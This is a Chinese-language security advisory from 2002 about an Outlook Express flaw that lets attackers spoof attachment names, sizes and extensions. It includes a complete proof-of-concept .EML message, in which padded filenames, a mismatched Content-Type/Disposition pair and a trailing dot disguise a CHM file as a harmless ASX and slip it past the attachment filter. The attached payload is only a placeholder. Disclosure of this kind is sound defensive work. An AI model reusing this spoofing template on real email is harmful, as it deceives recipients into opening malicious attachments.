Microsoft Outlook Express可欺骗文件扩展名漏洞

发布时间：2002-07-26
更新时间：2002-07-26
严重程度：中
威胁程度：欺骗
错误类型：设计错误
利用方式：服务器模式

BUGTRAQ ID：5277

受影响系统

Microsoft Outlook Express 5.0
Microsoft Outlook Express 5.5
   + Microsoft Internet Explorer 5.0.1
   + Microsoft Internet Explorer 5.0.1 for Windows 2000
   + Microsoft Internet Explorer 5.0.1 for Windows 95
   + Microsoft Internet Explorer 5.0.1 for Windows 98
   + Microsoft Internet Explorer 5.0.1 for Windows NT 4.0
   + Microsoft Internet Explorer 5.5
   - Microsoft Windows 2000 Workstation
   - Microsoft Windows 95
   - Microsoft Windows 98
   - Microsoft Windows 98SE
   - Microsoft Windows NT 4.0
Microsoft Outlook Express 6.0

详细描述
Outlook express存在漏洞，恶意用户可以通过操作MIME头，发送包含伪造文件扩展名的EMAIL来欺骗Outlook express处理，如把.exe扩展名更改为危害性小的.txt扩展名。

通过在文件名和实际扩展名包含部分字符，Outlook express就会错误的显示指定的文件扩展名。

测试代码
From: "Matthew Murphy" <mattmurphy@kc.rr.com>
Subject: E-mail
Date: Fri, 19 Jul 2002 23:37:23 -0500
MIME-Version: 1.0
Content-Type: multipart/mixed;
    boundary="----=_NextPart_000_007F_01C22F7D.412A3DA0"
X-Priority: 3
X-MSMail-Priority: Normal
X-Unsent: 1
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000

This is a multi-part message in MIME format.

------=_NextPart_000_007F_01C22F7D.412A3DA0
Content-Type: text/plain;
    charset="iso-8859-1"
Content-Transfer-Encoding: 7bit

This is a sample .EML exploiting several security issues
in Outlook Express 6.0.

1) Note the file attachment name overflow in the attachment list.
If a user specifies a VERY LONG attachment name, the attachment is
truncated in the "Attachments:" listbox.

NOTE: The number of spaces may require some precision work, so
test often until you get the right number! :-)

2) Note how a .CHM file bypassed the malicious application filter.
Normally, a user would not be allowed to open such a file, and the
file would be disabled by the MUA.  However, by using a mismatched
Content-Type/Content-Disposition pair, the filter allows access to
the potentially dangerous CHM file type.

3) Note how the "Open Attachment Warning" dialog displays the filename
when opening the file.  The incredibly long ending that we used to
spoof the attachments list is not even displayed, worse, the file name
could inaccurately be displayed as non-malicious (e.g, ASX as here)

4) Note how a specially crafted attachment name allows us to not only
spoof the name in the listbox, but also the size.  As the user does
not see the size of the attachment, we can fix this member to a false
value.  A typical use for this would be to make the file appear smaller
(safer?) than it really is.

5) Note how the icon is the typical default icon if a "." character is
appended to the end of the filename.  OE doesn't parse past the extra
dot, although Windows does.

------=_NextPart_000_007F_01C22F7D.412A3DA0
Content-Type: application/octet-stream;
    name="NewTitle.asx (132 KB)                                                                                                                                                                                                                                              "
Content-Transfer-Encoding: 7bit
Content-Disposition: attachment;
    filename="NewTitle.asx (132 KB)                                                                                                                                                                                                                                              "

This is not a real CHM file, just for the sake of demonstration!
------=_NextPart_000_007F_01C22F7D.412A3DA0
Content-Type: text/plain;
    name="ATT00119.txt"
Content-Transfer-Encoding: 7bit
Content-Disposition: attachment;
    filename="ATT00119.txt"

------=_NextPart_000_007F_01C22F7D.412A3DA0--

解决方案
无

相关信息
Matthew Murphy <mattmurphy@kc.rr.com>.
参考：http://online.securityfocus.com/bid/527

最近严重漏洞

Microsoft Outlook Express可欺骗文件扩展名漏洞